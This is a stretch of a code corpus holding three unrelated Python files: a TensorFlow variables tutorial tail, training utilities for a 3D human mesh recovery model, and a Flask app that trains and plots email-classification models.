print("\nIndex of highest value:", tf.argmax(my_variable))
# This creates a new tensor; it does not reshape the variable.
print("\nCopying and reshaping: ", tf.reshape(my_variable, [1, 4]))
# Variables can be all kinds of types, just like tensors
bool_variable = tf.Variable([False, False, False, True])
complex_variable = tf.Variable([5 + 4j, 6 + 1j])
# assign
a = tf.Variable([2.0, 3.0])
a.assign([1, 2]) # This will keep the same dtype, float32
# a.assign([1.0, 2.0, 3.0]) # Not allowed as it resizes the variable
# copy, two variables will not share the same memory
a = tf.Variable([2.0, 3.0])
b = tf.Variable(a) # Create b based on the value of a
a.assign([5, 6])
print(a.numpy()) # [5. 6.]
print(b.numpy()) # [2. 3.]
print(a.assign_add([2, 3]).numpy()) # [7. 9.]
print(a.assign_sub([7, 9]).numpy()) # [0. 0.]
variable_turn_off_gradient()
variable_placing()
| jk983294/morph | book/tensorflow/core/variables.py | variables.py | py | 1,966 | python | en | code | 0 | github-code | 36 |
70553071464 | import time, datetime
import numpy as np
import os
import os.path as osp
import torch
import torchvision
import matplotlib.pyplot as plt
import torchvision.utils as vutils
import torch.nn.functional as F
import cv2
import glob
import random
from lib.utils.eval_utils import (
batch_compute_similarity_transform_torch,
)
from lib.utils.geometry import batch_rodrigues
def inverse_normalize(tensor):
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
for t, m, s in zip(tensor, mean, std):
t.mul_(s).add_(m)
return tensor
def normalize(tensor):
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
for t, m, s in zip(tensor, mean, std):
t.sub_(m).div_(s)
return tensor
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
if self.count != 0:
self.avg = self.sum / self.count
def get_HHMMSS_from_second(seconds):
HHMMSS = time.strftime("%H:%M:%S", time.gmtime(seconds))
return HHMMSS
def save_checkpoint(state, output_dir, filename):
""" save model parameter """
save_path = "results/{}/save_pth".format(output_dir)
if not osp.exists(save_path):
os.makedirs(save_path)
torch.save(state, osp.join(save_path, filename))
def save_img(img, output_dir, filename, epoch=None, img_path=None, test_dataset=None, test_idx=None, vflip=False, hflip=False):
""" save image """
if isinstance(img, torch.Tensor):
img = img.cpu()
if isinstance(img_path, int):
img_path = str(img_path)
root = "results/{}/save_output_train".format(output_dir)
epoch = "epoch"+str(epoch)
save_path = osp.join(root, epoch, img_path)
elif epoch and img_path:
dataset = img_path.split("/")[2]
root = "results/{}/save_output_train/{}".format(output_dir, dataset)
epoch = "epoch"+str(epoch)
save_path = osp.join(root, epoch, ("_".join(img_path.split("/")[-2:])).replace(".jpg", ""))
elif test_dataset:
save_path = "results/{}/eval_data/{}_{}/{}".format(output_dir, test_dataset, epoch, test_idx)
if not osp.exists(save_path):
os.makedirs(save_path)
# For jigsaw image with tile
if len(img.shape) == 4: # tile, channel, width, height
for tile_idx, _img_tile in enumerate(img):
_filename = "_".join([filename.replace(".jpg", ""), str(tile_idx)]) + ".jpg"
# _img = np.transpose(vutils.make_grid(_img_tile, normalize=True), (1, 2, 0))
# _img = _img.numpy()
_img = inverse_normalize(_img_tile).detach().numpy()
_img = np.transpose(_img, (1, 2, 0))
if vflip:
_img = _img[::-1, :, :]
if hflip:
_img = _img[:, ::-1, :]
plt.imsave(osp.join(save_path, _filename), _img)
# For a image
elif len(img.shape) == 3: # channel, width, height
if isinstance(img, torch.Tensor):
# if filename == "reconst_img.jpg":
# img = np.transpose(vutils.make_grid(img, normalize=True), (1, 2, 0))
# img = img.numpy()
# plt.imsave(osp.join(save_path, filename), img)
if filename in ["detach.jpg", "rendering.jpg", "rendering_ren.jpg", "rendering_bg.jpg", "rendering1.jpg", "rendering_ren1.jpg",
"rendering2.jpg", "rendering_ren2.jpg", "rendering3.jpg", "rendering_ren3.jpg",
"rendering4.jpg", "rendering_ren4.jpg"]:
img = np.transpose(img, (1, 2, 0))
img = img.numpy()
cv2.imwrite(osp.join(save_path, filename), 255*img[:, :, ::-1])
else:
img = inverse_normalize(img).detach().numpy()
img = np.transpose(img, (1, 2, 0))
plt.imsave(osp.join(save_path, filename), img)
# if vflip:
# img = img[::-1, :, :]
# if hflip:
# img = img[:, ::-1, :]
elif len(img.shape) == 2: # width, height
if isinstance(img, torch.Tensor):
img = img[None, :, :]
img = np.transpose(vutils.make_grid(img, normalize=True), (1, 2, 0))
img = img.numpy()
# img = inverse_normalize(img).detach().numpy()[:, :, None]
# img = np.transpose(img, (1, 2, 0))
if vflip:
img = img[::-1, :, :]
if hflip:
img = img[:, ::-1, :]
plt.imsave(osp.join(save_path, filename), img)
def save_all_img(img_dict, output_dir, epoch=None, img_path=None, test_dataset=None, test_idx=None, vflip=False, hflip=False):
"""
img_dict keys: filename, value: image
"""
for filename, img in img_dict.items():
save_img(img, output_dir, filename, epoch, img_path, test_dataset, test_idx, vflip, hflip)
def save_mesh(verts, faces, output_dir, epoch, img_path=None, test_dataset=None, test_idx=None):
""" save verts """
filename = "mesh.obj"
img = verts.cpu().numpy()
faces = faces.cpu().numpy()
if isinstance(img_path, int):
img_path = str(img_path)
root = "results/{}/save_output_train".format(output_dir)
epoch = "epoch"+str(epoch)
save_path = osp.join(root, epoch, img_path)
elif test_dataset is not None and test_idx is not None:
save_path = "results/{}/eval_data/{}_{}/{}".format(output_dir, test_dataset, epoch, test_idx)
else:
dataset = img_path.split("/")[2]
root = "results/{}/save_output_train/{}".format(output_dir, dataset)
epoch = "epoch"+str(epoch)
save_path = osp.join(root, epoch, ("_".join(img_path.split("/")[-2:])).replace(".jpg", ""))
if not osp.exists(save_path):
os.makedirs(save_path)
if len(verts.shape) == 2:
with open(osp.join(save_path, filename), "w") as f:
for verts_xyz in verts:
f.write("v {} {} {}\n".format(verts_xyz[0], verts_xyz[1], verts_xyz[2]))
for face in faces:
f.write("f {} {} {}\n".format(face[0]+1, face[1]+1, face[2]+1))
def save_templates_info(test_templates, output_dir, filename):
""" save templates
save results information or train information """
save_path = "results/{}/save_txt".format(output_dir)
if not osp.exists(save_path):
os.makedirs(save_path)
_filename = osp.join(save_path, filename)
with open(_filename, "w") as f:
f.writelines("\n".join(test_templates))
def save_joints2d_img(gt_keypoints_2d, pred_keypoints_2d, output_dir, epoch, img_path):
"""
save image of joints2d on 2d coordinate while training
"""
line_list = [
[ 0, 1 ],
[ 1, 2 ],
[ 3, 4 ],
[ 4, 5 ],
[ 6, 7 ],
[ 7, 8 ],
[ 8, 2 ],
[ 8, 9 ],
[ 9, 3 ],
[ 2, 3 ],
[ 8, 12],
[ 9, 10],
[12, 9 ],
[10, 11],
[12, 13],
]
if isinstance(img_path, int):
img_path = str(img_path)
root = "results/{}/save_output_train".format(output_dir)
epoch = "epoch"+str(epoch)
save_path = osp.join(root, epoch, img_path)
else:
dataset = img_path.split("/")[2]
root = "results/{}/save_output_train/{}".format(output_dir, dataset)
epoch = "epoch"+str(epoch)
save_path = osp.join(root, epoch, ("_".join(img_path.split("/")[-2:])).replace(".jpg", ""))
if not osp.exists(save_path):
os.makedirs(save_path)
plt.figure()
ax = plt.subplot()
ax.invert_yaxis()
gt_2ds = gt_keypoints_2d.clone()
gt_2ds = gt_2ds.cpu()
pred_2ds = pred_keypoints_2d.clone()
pred_2ds = pred_2ds.cpu().detach()
for joint_idx, (gt_2d, pred_2d) in enumerate(zip(gt_2ds, pred_2ds)):
ax.scatter(gt_2d[0], gt_2d[1], marker='o', s=2, c="r")
ax.text(gt_2d[0], gt_2d[1], joint_idx+1)
ax.scatter(pred_2d[0], pred_2d[1], marker='o', s=2, c="b")
ax.text(pred_2d[0], pred_2d[1], joint_idx+1)
for start_point, end_point in line_list:
start_point = start_point
end_point = end_point
ax.plot([gt_2ds[start_point][0], gt_2ds[end_point][0]], [gt_2ds[start_point][1], gt_2ds[end_point][1]], "r", linewidth=2)
ax.plot([pred_2ds[start_point][0], pred_2ds[end_point][0]], [pred_2ds[start_point][1], pred_2ds[end_point][1]], "b", linewidth=2)
plt.savefig(osp.join(save_path, "joints2d.jpg"))
plt.close()
def save_joints3d_img(gt_keypoints_3d, pred_keypoints_3d, output_dir, epoch=None, img_path=None, test_dataset=None, test_idx=None):
"""
save image of joints3d on 3d coordinate while training
"""
line_list = [
[ 0, 1 ],
[ 1, 2 ],
[ 3, 4 ],
[ 4, 5 ],
[ 6, 7 ],
[ 7, 8 ],
[ 8, 2 ],
[ 8, 9 ],
[ 9, 3 ],
[ 2, 3 ],
[ 8, 12],
[ 9, 10],
[12, 9 ],
[10, 11],
[12, 13],
]
if isinstance(img_path, int):
img_path = str(img_path)
root = "results/{}/save_output_train".format(output_dir)
epoch = "epoch"+str(epoch)
save_path = osp.join(root, epoch, img_path)
elif epoch and img_path:
dataset = img_path.split("/")[2]
root = "results/{}/save_output_train/{}".format(output_dir, dataset)
epoch = "epoch"+str(epoch)
save_path = osp.join(root, epoch, ("_".join(img_path.split("/")[-2:])).replace(".jpg", ""))
elif test_dataset is not None and test_idx is not None:
save_path = "results/{}/eval_data/{}_{}/{}".format(output_dir, test_dataset, epoch, test_idx)
if not osp.exists(save_path):
os.makedirs(save_path)
plt.figure()
ax = plt.subplot(1, 1, 1, projection='3d')
gt_3ds = gt_keypoints_3d.clone()
gt_3ds = gt_3ds.cpu()
pred_3ds = pred_keypoints_3d.clone()
pred_3ds = pred_3ds.cpu().detach()
for joint_idx, (gt_3d, pred_3d) in enumerate(zip(gt_3ds, pred_3ds)):
ax.scatter(gt_3d[0], gt_3d[1], gt_3d[2], marker='o', s=2, c="r")
ax.text(gt_3d[0], gt_3d[1], gt_3d[2], joint_idx+1)
ax.scatter(pred_3d[0], pred_3d[1], pred_3d[2], marker='o', s=2, c="b")
ax.text(pred_3d[0], pred_3d[1], pred_3d[2], joint_idx+1)
for start_point, end_point in line_list:
start_point = start_point
end_point = end_point
ax.plot(
[gt_3ds[start_point][0], gt_3ds[end_point][0]],
[gt_3ds[start_point][1], gt_3ds[end_point][1]],
[gt_3ds[start_point][2], gt_3ds[end_point][2]],
color="r",
linewidth=2)
ax.plot(
[pred_3ds[start_point][0], pred_3ds[end_point][0]],
[pred_3ds[start_point][1], pred_3ds[end_point][1]],
[pred_3ds[start_point][2], pred_3ds[end_point][2]],
color="b",
linewidth=2)
plt.savefig(osp.join(save_path, "joints3d.jpg"))
plt.close()
def get_acc(output, label):
batch_size = output.shape[0]
pred = torch.argmax(output, dim=1)
correct = (pred==label).sum().item()
acc = correct/batch_size * 100
return acc
def spin2h36m_joint(spins, device):
"""
Get h36m 14 joints from spin 49 joints
"""
convert_matrix = torch.zeros((14, 49)).to(device)
h36m_index_list = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38]
for idx, h36m_index in enumerate(h36m_index_list):
convert_matrix[idx, h36m_index] = 1
h36m_joints = torch.matmul(convert_matrix, spins)
return h36m_joints
def get_spherical_coords(X):
# X is N x 3
rad = np.linalg.norm(X, axis=1)
# Inclination
theta = np.arccos(X[:, 2] / rad)
# Azimuth
phi = np.arctan2(X[:, 1], X[:, 0])
# Normalize both to be between [-1, 1]
vv = (theta / np.pi) * 2 - 1
uu = ((phi + np.pi) / (2*np.pi)) * 2 - 1
# Return N x 2
return np.stack([uu, vv],1)
def compute_uvsampler(verts, faces, tex_size=2):
"""
For this mesh, pre-computes the UV coordinates for
F x T x T points.
Returns F x T x T x 2
"""
alpha = np.arange(tex_size, dtype=np.float) / (tex_size-1)
beta = np.arange(tex_size, dtype=np.float) / (tex_size-1)
import itertools
# Barycentric coordinate values
coords = np.stack([p for p in itertools.product(*[alpha, beta])])
vs = verts[faces]
# Compute alpha, beta (this is the same order as NMR)
v2 = vs[:, 2]
v0v2 = vs[:, 0] - vs[:, 2]
v1v2 = vs[:, 1] - vs[:, 2]
# F x 3 x T*2
samples = np.dstack([v0v2, v1v2]).dot(coords.T) + v2.reshape(-1, 3, 1)
# F x T*2 x 3 points on the sphere
samples = np.transpose(samples, (0, 2, 1))
# Now convert these to uv.
uv = get_spherical_coords(samples.reshape(-1, 3))
# uv = uv.reshape(-1, len(coords), 2)
uv = uv.reshape(-1, tex_size, tex_size, 2)
return uv
def train_only_3task_network(
HMR,
context_encoder_net,
discriminator,
jigsaw_puzzle_net,
rotation_net,
loss_fn_BCE,
loss_fn_MSE,
loss_fn_CE,
losses_CE,
losses_DC,
acces_JP,
losses_JP,
acces_ROT,
losses_ROT,
discriminator_optimizer,
context_encoder_optimizer,
jigsaw_puzzle_optimizer,
rotation_optimizer,
img,
context_encoder_input,
center_crop_img,
jigsaw_input,
jigsaw_order,
rotation_img,
rotation_idx,
num_patch,
ones,
zeros,
batch_size,
):
### Context Encoder ###
# Update Discriminator
feature_ce = HMR(context_encoder_input, return_only_features=True)
feature_ce = feature_ce.reshape(-1, 2048, 1, 1)
output_ce = context_encoder_net(feature_ce)
output_ce_224 = context_encoder_input.clone()
output_ce_224[:, :, 80:144, 80:144] = output_ce.clone()
output_fake = discriminator(output_ce_224)
output_real = discriminator(img)
loss_BCE_fake = loss_fn_BCE(output_fake, zeros)
loss_BCE_real = loss_fn_BCE(output_real, ones)
loss_BCE = loss_BCE_fake + loss_BCE_real
losses_DC.update(loss_BCE.item(), batch_size)
discriminator_optimizer.zero_grad()
loss_BCE.backward()
discriminator_optimizer.step()
# Update Decoder
feature_ce = HMR(context_encoder_input, return_only_features=True)
feature_ce = feature_ce.reshape(-1, 2048, 1, 1)
output_ce = context_encoder_net(feature_ce)
output_ce_224 = context_encoder_input.clone()
output_ce_224[:, :, 80:144, 80:144] = output_ce.clone()
output_fake = discriminator(output_ce_224)
loss_BCE = loss_fn_BCE(output_fake, ones)
loss_MSE = loss_fn_MSE(output_ce, center_crop_img)
loss_ce = 0.001 * loss_BCE + 0.999 * loss_MSE
losses_CE.update(loss_ce.item(), batch_size)
context_encoder_optimizer.zero_grad()
loss_ce.backward()
context_encoder_optimizer.step()
### Jigsaw Puzzle ###
# Update classifier
_jigsaw_input = jigsaw_input.permute(1, 0, 2, 3, 4) # tile, batch, c, w, h
feature_jp = list()
for i in range(num_patch):
feature_jp.append(HMR(_jigsaw_input[i], return_only_features=True))
feature_jp.append(HMR(img, return_only_features=True))
feature_jp = torch.cat(feature_jp, 1)
output_jp = jigsaw_puzzle_net(feature_jp)
acc_jp = get_acc(output_jp, jigsaw_order)
acces_JP.update(acc_jp, batch_size)
loss_jp = loss_fn_CE(output_jp, jigsaw_order)
losses_JP.update(loss_jp.item(), batch_size)
jigsaw_puzzle_optimizer.zero_grad()
loss_jp.backward()
jigsaw_puzzle_optimizer.step()
### Rotation ###
# Update rotation net
feature_rot = HMR(rotation_img, return_only_features=True)
output_rot = rotation_net(feature_rot)
acc_rot = get_acc(output_rot, rotation_idx)
acces_ROT.update(acc_rot, batch_size)
loss_rot = loss_fn_CE(output_rot, rotation_idx)
losses_ROT.update(loss_rot, batch_size)
rotation_optimizer.zero_grad()
loss_rot.backward()
rotation_optimizer.step()
return output_ce_224
def train_hmr_using_3task(
HMR,
context_encoder_net,
discriminator,
jigsaw_puzzle_net,
rotation_net,
loss_fn_BCE,
loss_fn_MSE,
loss_fn_CE,
losses_CE,
acces_JP,
losses_JP,
acces_ROT,
losses_ROT,
losses_HMR_3task,
img,
context_encoder_input,
center_crop_img,
jigsaw_input,
jigsaw_order,
rotation_img,
rotation_idx,
num_patch,
ones,
zeros,
batch_size,
args,
):
# loss for HMR - ce
feature_ce = HMR(context_encoder_input, return_only_features=True)
feature_ce = feature_ce.reshape(-1, 2048, 1, 1)
output_ce = context_encoder_net(feature_ce)
output_ce_224 = context_encoder_input.clone()
output_ce_224[:, :, 80:144, 80:144] = output_ce.clone()
output_fake = discriminator(output_ce_224)
loss_BCE = loss_fn_BCE(output_fake, ones)
loss_MSE = loss_fn_MSE(output_ce, center_crop_img)
loss_ce = 0.001 * loss_BCE + 0.999 * loss_MSE
losses_CE.update(loss_ce.item(), batch_size)
# loss for HMR - jp
_jigsaw_input = jigsaw_input.permute(1, 0, 2, 3, 4) # tile, batch, c, w, h
feature_jp = list()
for i in range(num_patch):
feature_jp.append(HMR(_jigsaw_input[i], return_only_features=True))
feature_jp.append(HMR(img, return_only_features=True))
feature_jp = torch.cat(feature_jp, 1)
output_jp = jigsaw_puzzle_net(feature_jp)
acc_jp = get_acc(output_jp, jigsaw_order)
acces_JP.update(acc_jp, batch_size)
loss_jp = loss_fn_CE(output_jp, jigsaw_order)
losses_JP.update(loss_jp.item(), batch_size)
# loss for HMR - rot
feature_rot = HMR(rotation_img, return_only_features=True)
output_rot = rotation_net(feature_rot)
acc_rot = get_acc(output_rot, rotation_idx)
acces_ROT.update(acc_rot, batch_size)
loss_rot = loss_fn_CE(output_rot, rotation_idx)
losses_ROT.update(loss_rot, batch_size)
loss_HMR = args.ce_weight * loss_ce + args.jp_weight * loss_jp + args.rot_weight * loss_rot
loss_HMR = args.total_weight * loss_HMR
losses_HMR_3task.update(loss_HMR.item(), batch_size)
return loss_HMR, output_ce_224
def train_hmr_using_joints(
HMR,
loss_fn_keypoints,
losses_HMR_joints3d,
img,
gt_keypoints_2d,
gt_keypoints_3d,
has_joints3d,
joint_mapper_gt,
batch_size,
device,
args,
):
### training HMR resnet update using joints info
output = HMR(img)
output = output[-1]
### calcuate loss of 2d joints ###
pred_keypoints_2d = output["kp_2d"]
conf = gt_keypoints_2d[:, :, -1].unsqueeze(-1).clone()
joints2d_loss = (conf * loss_fn_keypoints(pred_keypoints_2d, gt_keypoints_2d[:, :, :-1])).mean()
joints2d_loss = 5*joints2d_loss
### calcuate loss of 3d joints ###
pred_keypoints_3d = output["kp_3d"][:, 25:, :]
conf = gt_keypoints_3d[:, :, -1].unsqueeze(-1).clone()
gt_keypoints_3d = gt_keypoints_3d[:, :, :-1].clone()
gt_keypoints_3d = gt_keypoints_3d[has_joints3d==1]
conf = conf[has_joints3d==1]
pred_keypoints_3d = pred_keypoints_3d[has_joints3d==1]
if len(gt_keypoints_3d) > 0:
gt_pelvis = (gt_keypoints_3d[:, 2, :] + gt_keypoints_3d[:, 3, :]) / 2
gt_keypoints_3d = gt_keypoints_3d - gt_pelvis[:, None, :]
pred_pelvis = (pred_keypoints_3d[:, 2, :] + pred_keypoints_3d[:, 3, :]) / 2
pred_keypoints_3d = pred_keypoints_3d - pred_pelvis[:, None, :]
joints3d_loss = (conf*loss_fn_keypoints(pred_keypoints_3d, gt_keypoints_3d)).mean()
pred_j3ds = pred_keypoints_3d[:, joint_mapper_gt, :].clone().detach()
target_j3ds = gt_keypoints_3d[:, joint_mapper_gt, :].clone().detach()
errors = torch.sqrt(((pred_j3ds - target_j3ds) ** 2).sum(dim=-1)).mean(dim=-1).cpu().numpy()
S1_hat = batch_compute_similarity_transform_torch(pred_j3ds, target_j3ds)
errors_pa = torch.sqrt(((S1_hat - target_j3ds) ** 2).sum(dim=-1)).mean(dim=-1).cpu().numpy()
m2mm = 1000
mpjpe = np.mean(errors) * m2mm
pa_mpjpe = np.mean(errors_pa) * m2mm
num_data = len(gt_keypoints_3d)
else:
joints3d_loss = torch.FloatTensor(1).fill_(0.).to(device).mean()
mpjpe = np.array(0)
pa_mpjpe = np.array(0)
num_data = len(gt_keypoints_3d)
total_loss = joints2d_loss
joints3d_loss = 5*joints3d_loss
total_loss += joints3d_loss
losses_HMR_joints3d.update(joints3d_loss.item(), batch_size)
total_loss *= 60
return total_loss, mpjpe, pa_mpjpe, num_data
def train_texture_net(
HMR,
texture_net,
img_renderer,
loss_fn_MSE,
loss_fn_mask,
losses_texture_ori_img,
losses_seg,
losses_texture_total,
texture_net_optimizer,
img,
black_img,
batch_size,
args,
gt_mask,
has_mask,
train_first_stage
):
output = HMR(img)
output = output[-1]
vertices = output['verts']
cam = output['theta'][:, :3]
textures = texture_net(img)
textures = textures.expand(-1, -1, 2, 2, 2, -1)
mask = gt_mask.clone().detach()
mask_est, rendering = img_renderer(vertices, cam, textures)
valid_mask = mask > 0
valid_mask = valid_mask[:, None, :, :].type(torch.int)
detach_images = img * valid_mask + black_img * (1-valid_mask)
for i in range(batch_size):
detach_images[i] = inverse_normalize(detach_images[i])
#======================================================================================#
# loss_texture => MSE loss (texture images with bg, original img)
# loss_seg => MSE loss (segmentation images, target seg)
# loss_texture_BCE => BCE loss (texture images with bg, Real(1))
# loss_texture_total => SUM(loss_texture, loss_seg, loss_texture_BCE)
#======================================================================================#
loss_texture_ori_img = loss_fn_MSE(detach_images[has_mask==1], rendering[has_mask==1])
losses_texture_ori_img.update(loss_texture_ori_img.item(), batch_size)
loss_all = args.rendering_weight*loss_texture_ori_img
if train_first_stage:
texture_net_optimizer.zero_grad()
loss_all.backward()
texture_net_optimizer.step()
return mask_est, detach_images, rendering, vertices
else:
_mask = mask_est[has_mask == 1]
_gt_mask = gt_mask[has_mask == 1]
if len(_mask) != 0 and len(_gt_mask) != 0:
loss_seg = loss_fn_mask(_mask, _gt_mask)
losses_seg.update(loss_seg.item(), batch_size)
loss_all += args.seg_weight * loss_seg
loss_all = args.texture_total_weight * loss_all
losses_texture_total.update(loss_all.item(), batch_size)
return loss_all, mask_est, detach_images, rendering, vertices
def train_hmr_using_adv_loss(
HMR,
texture_discriminator,
texture_net,
img_renderer,
losses_disc_e,
losses_disc,
losses_disc_real,
losses_disc_fake,
img,
batch_size,
):
output = HMR(img)[-1]
vertices = output['verts']
cam = output['theta'][:, :3]
textures = texture_net(img)
textures = textures.expand(-1, -1, 2, 2, 2, -1)
mask, rendering = img_renderer(vertices, cam, textures)
rendering_img = rendering.clone()
bg_idx = random.randint(1, 18)
bg_list = glob.glob("/data/indoor_bg/train/LR/{}/color/*.png".format(bg_idx))
cropped_bg_list = torch.zeros(batch_size, 3, 224, 224)
for i in range(batch_size):
random_idx = random.randint(0, len(bg_list)-1)
bg_path = bg_list[random_idx]
bg = cv2.imread(bg_path)
bg_w, bg_h, _ = bg.shape
h = w = 224
rand_idx_w = int(np.random.randint(bg_w-w))
rand_idx_h = int(np.random.randint(bg_h-h))
cropped_bg = bg[rand_idx_w:rand_idx_w+w, rand_idx_h:rand_idx_h+h, :]/255.0
cropped_bg = torch.from_numpy(cropped_bg).permute(2, 0, 1)
cropped_bg_list[i] = cropped_bg
cropped_bg_list = cropped_bg_list.to(rendering_img.device)
valid_mask = mask > 0
valid_mask = valid_mask[:, None, :, :].type(torch.int)
rendering_img_input = valid_mask * rendering_img + (1-valid_mask) * cropped_bg_list
rendering_bg = rendering_img_input.clone().detach()
for i in range(batch_size):
rendering_img_input[i] = normalize(rendering_img_input[i])
e_disc_loss = batch_encoder_disc_l2_loss(texture_discriminator(rendering_img_input))
losses_disc_e.update(e_disc_loss.item(), batch_size)
fake_rendering_img_input = rendering_img_input.clone().detach()
real = texture_discriminator(img)
fake = texture_discriminator(fake_rendering_img_input)
d_disc_real, d_disc_fake, d_disc_loss = batch_adv_disc_l2_loss(real, fake)
losses_disc.update(d_disc_loss.item(), batch_size)
losses_disc_real.update(d_disc_real.item(), batch_size)
losses_disc_fake.update(d_disc_fake.item(), batch_size)
return e_disc_loss, d_disc_loss, rendering_bg
def batch_encoder_disc_l2_loss(disc_value):
'''
Inputs:
disc_value: N x 25
'''
k = disc_value.shape[0]
return torch.sum((disc_value - 1.0) ** 2) * 1.0 / k
def batch_adv_disc_l2_loss(real_disc_value, fake_disc_value):
'''
Inputs:
disc_value: N x 25
'''
ka = real_disc_value.shape[0]
kb = fake_disc_value.shape[0]
lb, la = torch.sum(fake_disc_value ** 2) / kb, torch.sum((real_disc_value - 1) ** 2) / ka
return la, lb, la + lb | JunukCha/SSPSE | utils/trainer_utils.py | trainer_utils.py | py | 26,289 | python | en | code | 6 | github-code | 36 |
2051327559 | ##https://towardsdatascience.com/develop-a-nlp-model-in-python-deploy-it-with-flask-step-by-step-744f3bdd7776
from flask import Flask, request, jsonify,render_template,redirect,flash
import pandas as pd
import matplotlib.pyplot as plt
#from flask_cors import CORS
from data_Preprocessing import DataPreprocessing
from vectorization import Embedding
from models import model
import os
from predict_model import predict
from dataVisualization import DataVisualization
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
app = Flask(__name__, static_url_path='')
#app = Flask(__name__, static_url_path = "/static", static_folder = "static")
@app.route('/')
def home():
return render_template('index.html')
@app.route("/upload", methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
#print(request.files['file-7[]'])
#import pdb;pdb.set_trace();
f = request.files['file-7[]']
#data_xls = pd.read_excel(f)
resp = DataPreprocessing()
data_df = resp.preprocessing(f)
#print(data_df)
##Object for Vectorization
target_names = ['Cancellation_Rescheduling','EDI_CustomerProgram','Escalation_Linedown',
'Logistic_changes','MDL_Exclusion','NewPO_Forecast',
'OrderEnquiry','Other','POChanges','RMA' ]
class_vector = Embedding()
X_train, X_test, Y_train, Y_test=class_vector.input_data(data_df)
count_train,count_test = class_vector.Countvectorization(X_train, X_test)
tfidf_train,tfidf_test = class_vector.TfIdfVectorization(X_train, X_test)
##Created Objects for models
models=model()
vis = DataVisualization()
##multinomialNB
nb_pred_test,nb_pred_test_tfidf=models.multinomialNB(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("----NaiveBayes model Using Count Vectors----")
print(classification_report(Y_test, nb_pred_test))
nbcm1 = confusion_matrix(Y_test, nb_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm1, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/NB_CountVector.png')
##confusion matrix and classification report using Tfidf
print("------NaiveBayes model Using Tfidf -----")
nbcm2 = confusion_matrix(Y_test,nb_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/NB_TfIdf.png')
##supportVectorMachine
svmc_pred_test,svmc_pred_test_tfidf = models.supportVectorMachine(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("----SVM Using Count Vectors----")
print(classification_report(Y_test, svmc_pred_test))
svmcm1 = confusion_matrix(Y_test,svmc_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/svmCount.png')
##confusion matrix and classification report using Tfidf
print("--------SVM Tfidf------")
print(classification_report(Y_test,svmc_pred_test_tfidf))
svmcm1 = confusion_matrix(Y_test,svmc_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/svmTfidf.png')
##decisionTreeClassifier
dtc_pred_test,dtc_pred_test_tfidf=models.decisionTreeClassifier(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("--------Decision CountVector------")
print(classification_report(Y_test,dtc_pred_test))
dtc1 = confusion_matrix(Y_test,dtc_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/dtc_Count.png')
##confusion matrix and classification report using Tfidf
print("--------Decision tfidf------")
print(classification_report(Y_test,dtc_pred_test_tfidf))
dtc2 = confusion_matrix(Y_test,dtc_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/dtc_Tfidf.png')
##randomClassifier
random_pred_test,random_pred_test_tfidf=models.randomClassifier(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("--------RandomForest CountVector------")
print(classification_report(Y_test,random_pred_test))
randomclassifier1 = confusion_matrix(Y_test,random_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/RF_Count.png')
##confusion matrix and classification report using Tfidf
print("--------RandomForest tfidf------")
print(classification_report(Y_test,dtc_pred_test_tfidf))
randomclassifier2 = confusion_matrix(Y_test,random_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/RF_Tfidf.png')
##LogisticRegression
logeg_test,logreg_tfidf_test= models.LogisticRegression(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("--------LogisticRegression CountVector------")
print(classification_report(Y_test,logeg_test))
randomclassifier1 = confusion_matrix(Y_test,logeg_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/logreg_Count.png')
##confusion matrix and classification report using Tfidf
print("--------LogisticRegression tfidf------")
print(classification_report(Y_test,logreg_tfidf_test))
randomclassifier2 = confusion_matrix(Y_test,logreg_tfidf_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
